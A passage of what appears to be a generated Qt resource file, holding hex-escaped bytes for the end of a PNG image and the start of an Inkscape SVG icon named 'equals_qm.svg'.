\x29\x6c\x34\xe5\xb8\x36\xb6\xf3\x5e\x49\x7f\xd9\x58\x29\x85\xb2\
\xb2\x0c\x0d\xbe\x72\x5c\x1a\x7c\x47\x99\x0a\x90\xce\x22\x4e\x00\
\x00\xce\x6b\xb1\xf1\x5f\xd8\xf8\x59\xf3\x23\x7f\x4e\x44\xaf\x50\
\x9c\x21\x65\xa1\x42\xc7\xf3\x6c\x85\x72\x5e\x9d\xdd\x47\x9d\x8d\
\xa7\xec\xfc\x24\x43\x83\x5b\xd9\xb5\xfd\x3e\x86\x07\x36\x81\xca\
\x1f\x33\x25\x5e\x87\xab\x38\xe4\x08\xaa\x00\xe1\xe8\x71\x3d\xe6\
\x6e\x0e\xa7\x02\xbb\x82\x15\x4a\xbe\xbc\x2d\x5c\xfc\x52\x2c\x21\
\x91\x52\xf3\xc5\xbd\x70\x75\xbc\xaf\x32\x5c\xf9\xe2\xed\x30\xe2\
\xc9\x03\x65\x65\x18\xea\xdf\xcc\x8e\x57\xbe\xc3\xe0\xfe\x17\xfd\
\x99\x5f\x2d\x00\x0e\x94\x01\x07\x02\x30\x8f\x26\x78\xa6\x73\xd8\
\xfe\xcd\xc7\xb6\x04\x40\xb8\xbb\x73\x44\x02\x4c\x2f\x6c\x2d\x2f\
\x8a\x8e\x01\x15\x85\x05\x1d\x77\xfd\xbf\x70\xef\x32\xbe\x64\x93\
\x26\x81\x7b\x7a\xb4\xd0\xb0\xac\x49\x86\xfb\x37\xb3\xb3\xf3\x5e\
\x86\x07\x5e\x42\x60\x21\xa4\x9c\x96\x01\x65\x1e\xc9\x1f\x69\x62\
\x78\x4d\xd3\xb4\xd0\xf3\x16\xc2\xfe\xbe\x63\x12\x00\xbe\x5e\x0f\
\xce\x34\x7f\xdf\x70\x02\x33\x1a\x84\xf4\xf4\x7b\xe1\xec\x78\x81\
\x40\xc8\x29\xce\x8b\x15\xb8\xb1\xfd\x4d\x74\xbd\x72\x0f\x43\xfd\
\x2f\x96\x89\xfd\x6a\xcf\x48\xf8\x63\x48\x80\xb0\x67\x07\xcf\x70\
\x0a\xdb\xbe\xff\x60\x41\x70\x44\x4b\xc3\x3c\x7f\x3c\xf8\x7f\xfb\
\xb5\xfe\x45\x4c\x02\x43\x17\xa4\x9a\x35\x0c\xc3\x99\xb9\x96\x0d\
\x7d\xfd\x36\x96\x7b\x7e\x84\xae\x43\xba\x45\xc7\xd0\x05\xb9\xbc\
\x62\xdf\xfe\x3c\xd9\x4c\x96\xa1\xfe\x4d\xec\x7c\xe5\xdb\x4c\x8e\
\x6d\xe3\xc4\x85\x27\x60\x9a\xce\x96\xae\xd9\x6c\x96\xb7\xde\x7a\
\x8b\x6c\x36\x8b\x10\x02\xd3\x34\x69\x6f\x6f\x27\x12\x71\x24\x52\
\x26\x93\xf1\xfb\x01\x0c\xc3\xa0\xbd\xbd\x1d\xd3\x34\xc9\x66\xb3\
\xec\xd9\xb3\xa7\x28\x83\xd8\x34\x4d\xe6\xce\x9d\x1b\x3a\xbe\xd7\
\x1f\x36\x7e\x2e\x97\xab\xd8\x1f\x7c\x46\xa5\x33\x98\x0e\x16\x04\
\x47\xb6\x36\xd0\x17\xeb\xa2\x38\x14\x5c\x12\x05\x46\x08\xd2\x2d\
\x1a\x0f\xdc\x35\xab\x68\xa6\xfc\xed\xe7\x7a\xe8\xde\x67\x21\x84\
\x20\xd9\x28\xf9\xde\x9d\x85\x1a\x84\x4f\xac\xde\xc3\xf6\xce\x4d\
\xec\xd8\x76\x0f\xc3\x03\x2f\x31\xff\x84\xb9\x6c\xdb\xb6\xad\xe8\
\xf1\xa7\x9f\x7e\xba\x5f\x10\xd2\xd1\xd1\xc1\xd6\xad\x5b\xcb\xfa\
\xbb\xba\xba\x00\xa7\xbe\xa1\xb3\xb3\xd3\xff\xb1\x97\x2c\x59\xe2\
\xf7\x79\xf4\x61\xe3\x7b\xdf\x99\x37\x6f\x1e\x5b\xb6\x14\x97\x8f\
\x9d\x71\xc6\x19\x53\xf6\x7b\xf4\x61\xa7\xb2\x78\xbf\x43\x70\x4b\
\xfe\xd2\x83\x3c\xaa\x91\x5c\x47\xb8\xa4\xb5\x10\xaa\xf5\x8f\x02\
\x0f\x5c\xc2\xcd\xdf\x33\x74\x41\xaa\x45\x47\x08\xc1\x2d\x6b\xfa\
\xb9\xf9\x4e\x27\xf1\x23\xdd\xa2\x13\x31\x9d\x90\xef\xc8\x98\xe2\
\x53\x5f\xec\xe5\x5f\xbe\xe9\x1c\x54\x9d\x19\xdf\xce\xce\xce\x7f\
\x65\x74\xe8\x65\xa2\x11\x9d\x79\xf3\xe6\x21\x84\xe0\x83\x1f\xfc\
\x20\x97\x5f\x7e\x39\x42\x08\xe6\xcd\x9b\x47\x3c\x1e\x27\x1e\x8f\
\xfb\x05\x28\x97\x5f\x7e\x39\x97\x5f\x7e\xb9\xcf\xd4\x58\x2c\x86\
\xa6\x69\x0c\x0c\x0c\x70\xe6\x99\x67\x72\xcd\x35\xd7\x20\x84\x20\
\x1e\x8f\xfb\xc7\xea\x46\xa3\x51\x3a\x3a\x3a\x42\xc7\x4f\x24\x12\
\x24\x12\x09\xbf\xff\xca\x2b\xaf\xe4\xca\x2b\xaf\x44\x08\x41\x47\
\x47\x47\xd9\xf3\xaf\xb8\xe2\x8a\xa2\xe7\x47\xa3\x51\xff\x18\xdf\
\xe0\x71\xbe\x52\x4a\xbf\x88\xd6\xbb\xf7\x5e\x4b\xd5\xca\x54\x6a\
\xe8\x88\x7a\x01\xc5\x7f\x98\xa8\x08\x91\x54\x8b\xc6\x1d\x37\xa4\
\xf8\x5f\xb7\xef\xe7\xd5\xae\x2c\x02\xb8\xf1\x6b\xfd\xdc\xfe\xcf\
\x29\xfe\xee\x0b\xbd\xf4\xf4\x59\xd8\x16\xec\xeb\xb3\x30\x35\x47\
\xa4\xee\x7d\xe3\x51\x86\x07\x36\x21\xb0\x98\x37\x6f\x21\xbf\xf8\
\xc5\x2f\xb8\xe4\x92\x4b\xd8\xb8\x71\x23\x00\x97\x5e\x7a\x29\x4f\
\x3e\xf9\x24\xcb\x97\x2f\x07\xe0\xc9\x27\x9f\xe4\xd2\x4b\x2f\xf5\
\x33\x9a\xbd\xfe\x65\xcb\x96\xb1\x63\xc7\x0e\xf2\xf9\x3c\xbb\x76\
\xed\x22\x1a\x75\x96\x9c\x3d\x46\x00\x9c\x70\xc2\x09\x6c\xd8\xb0\
\x61\xda\xf1\x2f\xbb\xec\x32\x7f\xfc\xcb\x2e\xbb\x8c\x9f\xff\xfc\
\xe7\x9c\x7d\xf6\xd9\x80\xb3\x15\x8d\xd7\xaf\x94\xf2\xe9\xcf\x3a\
\xeb\x2c\x5f\x0a\x04\x0f\xe7\x92\x52\xfa\xef\x4b\x8f\xe3\x99\x2a\
\x85\xac\xb4\xef\x88\x97\x87\x57\x42\xa8\xf7\x91\x00\x4c\xc3\x41\
\xf6\xf0\xa8\x4d\x2e\x87\x7f\xef\xe8\x4e\xe1\x0b\x0d\xdb\xca\x32\
\x32\xf4\x06\xd0\xce\xd8\xe8\x1f\x90\xc2\x06\x77\x86\x02\xf4\xf7\
\xf7\xfb\x3a\xd7\x3b\xd2\x3e\x16\x8b\xf9\xcf\x1c\x18\x18\xf0\xfb\
\xbd\x32\xb1\x58\x2c\xe6\x1f\x7d\xa3\x94\xf2\xef\xbd\xd9\x08\x1c\
\xf4\xf8\xa5\xfd\x4a\xa9\xb2\xe7\x07\x99\x5e\xfa\x5a\xca\xf8\xa9\
\xec\x82\xd2\xbe\xa3\x7a\x83\x08\xef\x00\x11\x21\x02\xd1\x01\x51\
\x60\xb8\x07\x14\x29\x41\x59\x59\x86\x07\x36\x31\xde\xfd\x33\xe0\
\x42\x04\xb6\x3f\x43\x3d\x46\x05\xc5\x64\xf0\x28\x9b\x20\x53\x4b\
\x69\x3c\x31\x5f\xaa\x5f\xc3\xbe\x1b\x36\x7e\x50\x2c\x87\xd1\x84\
\xf5\x97\x02\x4d\xd3\xb4\x22\x2f\xc0\xb2\xac\x50\x10\x48\x29\xa7\
\x3c\xd7\x29\x0c\x04\xc7\xd4\x0e\x21\xa5\x80\xf0\x00\xa0\xec\x2c\
\x43\x03\x2f\xb3\x6b\xfb\x7d\xcc\x4a\x8d\x95\x49\x96\x30\x06\x04\
\x19\x51\x0d\x53\xbd\x1f\x33\x8c\x6e\xaa\xf1\xa7\x02\x5b\xd8\x38\
\x95\xfa\x3d\x46\x97\xde\x97\x8a\xf7\x30\x83\x70\x2a\x10\x1c\xf5\
\xfb\x9a\x08\x01\xf9\xbc\xf3\x0f\x34\x36\x68\x98\x3a\x98\x06\x34\
\x36\x48\xdf\xdd\x72\x72\xf8\xee\x63\x64\x70\x33\xc2\xcd\x29\x08\
\x1a\x4d\x9e\xd8\x4d\xa7\xd3\x44\xa3\x51\x62\xb1\x18\xa9\x94\x53\
\x81\x94\xcf\xe7\xc9\xe7\x9d\xbc\xbf\x54\x2a\x45\x34\x1a\x25\x1a\
\x8d\xfa\xfd\xb9\x5c\xae\x68\x56\x97\x32\x6b\x26\xe3\xa7\xd3\x69\
\x62\xb1\x18\xf1\x78\xdc\x2f\x7a\xb1\x2c\xab\xac\x3f\xf8\xfc\x6c\
\x36\x8b\x94\x92\x48\x24\xe2\xbb\x89\x42\x08\xff\xbd\x69\x9a\xfe\
\x7b\xcf\x0d\x2d\x55\xab\x95\x8c\x40\x21\xc4\xd1\x09\x00\x51\x12\
\xdb\xe9\x1f\xb4\xf8\xe7\xaf\xf6\xf1\x95\x2f\x15\xab\x9a\xbc\x00\
\x00\x04\x2c\x49\x44\x41\x54\xb6\x70\xfa\xa9\x26\x4b\x4e\x31\xb9\
\xed\x73\x2d\xdc\x7c\x67\x37\x5d\x6f\xbe\xc4\xee\x3f\xdc\xc7\xe4\
\x58\x27\xf3\x4f\x98\xcb\x82\x05\x0b\x00\x58\xb0\x60\x01\x0b\x16\
\x2c\x20\x12\x89\xd0\xd3\xd3\xc3\x15\x57\x5c\xc1\x8f\x7f\xfc\x63\
\xce\x3f\xff\x7c\xce\x3b\xef\x3c\x9e\x78\xe2\x09\x56\xae\x5c\x49\
\x4f\x4f\x0f\xdd\xdd\xdd\x5c\x75\xd5\x55\xac\x5f\xbf\x9e\xf3\xce\
\x3b\x8f\xf3\xce\x3b\x8f\xf5\xeb\xd7\x73\xd5\x55\x57\xd1\xd3\xd3\
\xe3\xff\xc0\x0b\x17\x2e\x3c\xa8\xf1\xd7\xad\x5b\xc7\xb9\xe7\x9e\
\xcb\x39\xe7\x9c\xc3\xe3\x8f\x3f\xce\xd5\x57\x5f\x4d\x77\x77\x37\
\xdd\xdd\xdd\x5c\x7d\xf5\xd5\x7e\xbf\xf7\xfc\x95\x2b\x57\xd2\xdb\
\xdb\x8b\x10\x82\xf6\xf6\x76\xb6\x6c\xd9\x42\x7b\x7b\x3b\x42\x08\
\xe6\xce\x9d\xcb\x6b\xaf\xbd\xe6\x7b\x17\x1d\x1d\x1d\x74\x75\x75\
\xf9\xde\x44\xb5\x20\x38\x26\x54\x40\x2e\x07\xfb\xfb\x9d\x64\x8e\
\x5b\x56\xb5\xf8\x9f\xef\xe8\xda\xc6\xeb\x9b\xef\x65\x64\x70\x33\
\xb3\x67\xa5\xf8\xfd\xef\x7f\xef\xf7\x79\xe5\x5b\xcb\x97\x2f\x67\
\xef\xde\xbd\x74\x77\x77\x03\x4e\x79\x99\xd7\xba\xbb\xbb\xc9\x64\
\x32\x08\x21\xfc\xfe\x87\x1f\x7e\xb8\xa8\xdf\x0b\xc4\xa4\x52\x29\
\x9e\x7d\xf6\xd9\x19\x8f\xef\xd1\x87\x8d\xbf\x77\xef\x5e\x32\x99\
\x8c\x7f\x5f\xa9\xbf\x94\x91\xd3\xb9\x76\xa5\x27\xc0\x4f\xa5\x0e\
\x8e\x58\x52\x68\x5d\xc3\xc9\x9c\xf9\xae\xfb\x48\x34\x9e\x14\xe2\
\xbb\x16\x5e\x85\x1b\xe6\xd7\x0d\x68\x6d\xd1\x31\x0d\x81\x52\x59\
\x06\xf7\x77\xf2\xe2\x33\xdf\xa2\xaf\x77\x23\x02\x0b\xd3\x34\x69\
\x6b\x6b\xf3\x45\xa4\x52\x8a\x4c\x26\xc3\xde\xbd\x7b\xc9\xe5\x72\
\x44\x22\x11\xda\xda\xda\x30\x0c\x03\x21\x04\xb9\x5c\x8e\xb7\xdf\
\x7e\x9b\x5c\x2e\xe7\x47\x02\xbd\x7e\x4f\xf4\x7b\x91\x3c\xa5\x14\
\xa6\x69\x32\x7b\xf6\x6c\x3f\xd2\xe7\x45\xeb\xf6\xee\xdd\x4b\x36\
\x9b\x9d\xd1\xf8\x42\x08\xb2\xd9\xac\x4f\xeb\x45\x02\xe7\xcc\x99\
\xe3\x3f\xdf\x8b\x24\x66\x32\x19\x6c\xdb\xc6\x30\x0c\x9a\x9b\x9b\
\xe9\xed\xed\x65\x72\x72\x12\x5d\xd7\x69\x69\x69\xf1\xdf\x1b\x86\
\x41\x3a\x9d\xa6\xa7\xa7\xc7\x07\x55\xd8\xb1\xbd\xc7\x04\x00\x7c\
\xe6\x3b\xab\xc6\xfe\xab\x14\x4e\xed\xde\xf0\xc0\x26\x76\x76\x7e\
\x87\x91\xc1\x97\xfd\xd8\x7e\xd8\xac\xa8\xf4\xbe\xf4\xb5\xda\x95\
\xc0\xe9\x8e\xd1\x9b\x6a\xfc\x6a\xc4\x71\x18\xb3\x4a\xcf\x64\x0e\
\xc6\x02\xa6\x3a\xb9\x7d\xaa\xbf\xfb\x98\x71\x03\xbd\x65\x01\x04\
\xa8\x7c\x86\x89\xc9\x6e\x26\xc6\x77\xb3\x67\xfb\xf7\x18\x1e\x74\
\x82\x3c\x95\x8e\xb9\xad\xf4\xe3\x96\xfa\xcb\xd3\x7d\x7f\x26\x0b\
\x42\x61\xe3\xcf\x64\x65\xb1\x94\x49\x61\x4c\x9d\x76\x46\xcf\x70\
\x6d\xe0\x98\xb0\x01\x9c\x15\xbd\x97\xd8\xb5\xfd\xdf\x98\x1c\xdf\
\x4d\x76\xb2\xc7\x67\x7e\xe9\x35\x1d\x10\x82\x4c\x9f\x8a\x29\x95\
\x4e\x4a\xaf\x76\x45\x6f\xba\xf1\xab\x91\x38\x40\xe8\xec\x9e\x0a\
\x98\x33\x5d\x18\x3a\xaa\x01\xa0\x70\x66\xfe\xe0\xfe\x17\xd9\xf1\
\xca\xb7\x18\xea\xdf\x84\x20\x57\x16\x70\x09\xf3\xf9\xa7\x13\xcf\
\xd5\x2c\xc5\xce\x64\x59\x78\xaa\xf1\x67\x9a\x4b\x30\x95\x24\x98\
\x4e\xdc\x1f\x5b\xab\x81\xd3\x88\x7e\x65\x67\x18\xdc\xff\x02\x5d\
\x5b\xbf\xc5\x50\xff\x0b\xa0\xf2\x7e\x80\xc4\x0b\x84\x4c\x65\x15\
\x57\xeb\x0b\x57\xc3\x88\xe9\x7e\xe4\x03\x19\x7f\xa6\x76\x47\x70\
\x25\xb0\xf4\x7e\x3a\xd5\x50\xe9\x7f\x38\x6a\x01\x60\x5b\x0e\xf3\
\xdf\xdc\xf2\x0d\x9f\xf9\xc1\xe5\xcf\xa9\x98\x5f\xad\xc1\x35\xd5\
\x77\xa6\x62\xf6\x4c\x44\xfb\x81\x00\x20\x0c\x78\x95\x8c\xc3\xe9\
\x8c\xbc\xe9\x0c\x57\xfd\x68\x65\xfe\x40\xdf\x0b\xbc\xb9\xe5\xeb\
\x0c\xf5\xbf\x80\x72\xb7\x67\xab\x64\x74\x4d\xa5\x7b\x0f\x96\x29\
\x07\x22\x5a\x0f\x55\xfa\xd8\x74\x86\xdf\x54\x33\xbe\x5a\xfb\x40\
\x3f\x9a\x99\x3f\xb8\x7f\xa3\xcf\xfc\xb0\x4c\x98\xa0\xa5\x7d\x38\
\x77\xd1\x38\xf2\xea\xb0\xf2\x8c\xae\xd6\x56\xa9\x04\x64\xfd\x68\
\x67\x7e\x98\x7b\x35\x93\x59\x7a\x38\x40\x50\x9c\xb4\xfa\xc7\x63\
\xfe\x74\xef\x67\xfa\xfb\x28\xa5\x8e\x1e\x00\x54\x62\x7e\x25\x1f\
\xbb\x34\x51\xf2\x50\x8a\xf0\xc3\xa5\x1a\x0e\x87\x34\x38\xd0\xbf\
\xef\xa8\x5a\x0e\x2e\x65\xbe\x77\xae\x6f\x25\xd7\xac\xd4\xdf\x9f\
\xce\x35\x7b\x27\xa9\x80\x43\x01\xc8\xa3\x2a\x12\x68\xdb\x19\x06\
\xfb\x5e\x2c\x63\xfe\x54\xa2\x36\x2c\xfa\x75\x34\xcd\xd2\x23\x0d\
\x86\x99\xd0\xeb\x47\x9a\xf9\x43\xfb\x5e\xe2\xcd\xad\xe5\xcc\xaf\
\x34\xeb\x8f\x17\x46\xff\xb1\x40\x73\xc4\x00\x60\x5b\x19\x06\xf6\
\xbf\x40\xef\xce\x9f\x32\xb8\xff\xc5\x50\xe6\xcf\x14\x08\x35\x46\
\x1f\x80\xcb\xca\x11\x5a\x0d\x94\xd2\xc4\x88\xa6\xc8\x4d\xf6\x39\
\xa7\x78\x1c\x82\x76\x2c\x83\xe3\x48\x49\xb1\x23\xb8\x4b\xd8\xe1\
\x79\xfc\xb1\x0a\x82\xe3\x14\x00\xb5\x76\xa4\x9b\xac\xfd\x04\x35\
\x00\xd4\x5a\x0d\x00\xb5\x56\x03\x40\xad\x1d\x97\xed\xff\x03\x44\
\xcc\x2a\x9e\xfe\x98\xe9\xac\x00\x00\x00\x00\x49\x45\x4e\x44\xae\
\x42\x60\x82\
\x00\x00\x0b\x40\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x33\x32\
\x70\x78\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x33\
\x32\x70\x78\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\
\x22\x30\x20\x30\x20\x33\x32\x20\x33\x32\x22\x0a\x20\x20\x20\x76\
\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\
\x69\x64\x3d\x22\x53\x56\x47\x52\x6f\x6f\x74\x22\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x30\x2e\x39\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\
\x22\x65\x71\x75\x61\x6c\x73\x5f\x71\x6d\x2e\x73\x76\x67\x22\x3e\
\x0a\x20\x20\x3c\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6e\x61\x6d\
\x65\x64\x76\x69\x65\x77\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\
\x62\x61\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x70\x61\x67\x65\x63\
\x6f\x6c\x6f\x72\x3d\x22\x23\x66\x66\x66\x66\x66\x66\x22\x0a\x20\
\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\x63\x6f\x6c\x6f\x72\x3d\
\x22\x23\x36\x36\x36\x36\x36\x36\x22\x0a\x20\x20\x20\x20\x20\x62\
\x6f\x72\x64\x65\x72\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x31\x2e\
\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x70\x61\x67\x65\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\x2e\
\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x70\x61\x67\x65\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x7a\x6f\
\x6f\x6d\x3d\x22\x31\x36\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x63\x78\x3d\x22\x32\x30\x2e\x33\x38\x34\
\x37\x34\x33\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x63\x79\x3d\x22\x31\x34\x2e\x39\x35\x33\x31\x32\x35\
\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2d\x75\x6e\x69\x74\x73\x3d\x22\
\x70\x78\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x63\x75\x72\x72\x65\x6e\x74\x2d\x6c\x61\x79\x65\x72\x3d\
\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\x20\x20\x20\x73\x68\
\x6f\x77\x67\x72\x69\x64\x3d\x22\x66\x61\x6c\x73\x65\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\
\x64\x6f\x77\x2d\x77\x69\x64\x74\x68\x3d\x22\x31\x39\x32\x30\x22\
\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\
\x69\x6e\x64\x6f\x77\x2d\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x31\
\x34\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x78\x3d\x22\x30\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\
\x64\x6f\x77\x2d\x79\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x6d\
\x61\x78\x69\x6d\x69\x7a\x65\x64\x3d\x22\x31\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x69\x64\x2d\
\x62\x62\x6f\x78\x3d\x22\x74\x72\x75\x65\x22\x20\x2f\x3e\x0a\x20\
\x20\x3c\x64\x65\x66\x73\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\
\x64\x65\x66\x73\x34\x34\x38\x35\x22\x20\x2f\x3e\x0a\x20\x20\x3c\
\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x20\x20\x20\x20\x20\x69\x64\
\x3d\x22\x6d\x65\x74\x61\x64\x61\x74\x61\x34\x34\x38\x38\x22\x3e\
\x0a\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\x44\x46\x3e\x0a\x20\
\x20\x20\x20\x20\x20\x3c\x63\x63\x3a\x57\x6f\x72\x6b\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\
\x3d\x22\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\
\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x69\x6d\x61\x67\x65\x2f\x73\x76\
\x67\x2b\x78\x6d\x6c\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\
\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x79\
\x70\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\
\x66\x3a\x72\x65\x73\x6f\x75\x72\x63\x65\x3d\x22\x68\x74\x74\x70\
\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x64\
\x63\x6d\x69\x74\x79\x70\x65\x2f\x53\x74\x69\x6c\x6c\x49\x6d\x61\
\x67\x65\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\
\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x3c\x2f\x64\x63\x3a\x74\x69\
\x74\x6c\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\x63\x3a\
\x57\x6f\x72\x6b\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\
\x52\x44\x46\x3e\x0a\x20\x20\x3c\x2f\x6d\x65\x74\x61\x64\x61\x74\
\x61\x3e\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\x64\x65\
\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\x45\x62\
\x65\x6e\x65\x20\x31\x22\x3e\x0a\x20\x20\x20\x20\x3c\x67\x0a\x20\
\x20\x20\x20\x20\x20\x20\x61\x72\x69\x61\x2d\x6c\x61\x62\x65\x6c\
\x3d\x22\x09\xe2\x89\x9f\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\
\x74\x79\x6c\x65\x3d\x22\x66\x6f\x6e\x74\x2d\x73\x74\x79\x6c\x65\
\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x76\x61\x72\
\x69\x61\x6e\x74\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\
\x2d\x77\x65\x69\x67\x68\x74\x3a\x39\x30\x30\x3b\x66\x6f\x6e\x74\
\x2d\x73\x74\x72\x65\x74\x63\x68\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\
\x66\x6f\x6e\x74\x2d\x73\x69\x7a\x65\x3a\x34\x30\x70\x78\x3b\x6c\
\x69\x6e\x65\x2d\x68\x65\x69\x67\x68\x74\x3a\x31\x2e\x32\x35\x3b\
\x66\x6f\x6e\x74\x2d\x66\x61\x6d\x69\x6c\x79\x3a\x27\x53\x6f\x75\
\x72\x63\x65\x20\x43\x6f\x64\x65\x20\x50\x72\x6f\x27\x3b\x2d\x69\
